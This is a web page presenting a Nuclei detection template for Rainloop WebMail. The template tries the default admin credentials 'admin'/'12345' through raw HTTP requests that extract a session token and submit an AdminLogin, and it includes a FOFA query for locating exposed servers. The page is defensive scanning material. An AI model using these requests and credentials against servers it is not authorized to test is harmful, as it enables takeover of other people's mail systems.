Rainloop WebMail - Default Admin Login

ID: rainloop-default-login

Severity: high

Author: For3stCo1d

Tags: default-login,rainloop,webmail,foss

Description

Rainloop WebMail default admin login credentials were successful.

YAML Source

id: rainloop-default-login

info:
  name: Rainloop WebMail - Default Admin Login
  author: For3stCo1d
  severity: high
  description: Rainloop WebMail default admin login credentials were successful.
  reference:
    - https://github.com/RainLoop/rainloop-webmail/issues/28
  classification:
    cpe: cpe:2.3:a:rainloop:webmail:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: rainloop
    product: webmail
    fofa-query: app="RAINLOOP-WebMail"
  tags: default-login,rainloop,webmail,foss

http:
  - raw:
      - |
        GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /?/Ajax/&q[]=/0/ HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        Login={{user}}&Password={{pass}}&Action=AdminLogin&XToken={{token}}

    attack: pitchfork
    payloads:
      user:
        - admin
      pass:
        - 12345

    extractors:
      - type: regex
        name: token
        internal: true
        group: 1
        regex:
          - 'token":"(.+?)"'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"Action":"AdminLogin"'
          - '"Result":true'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a004630440220072b18ee0ba7cfb1a72b4307046e3b0687ec013337c10c6b607c952e68dc694c0220094e3de26383deb1e535d4885be5e48190b9394dd087c16b81864e57af365060:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/default-logins/rainloop/rainloop-default-login.yaml"

View on Github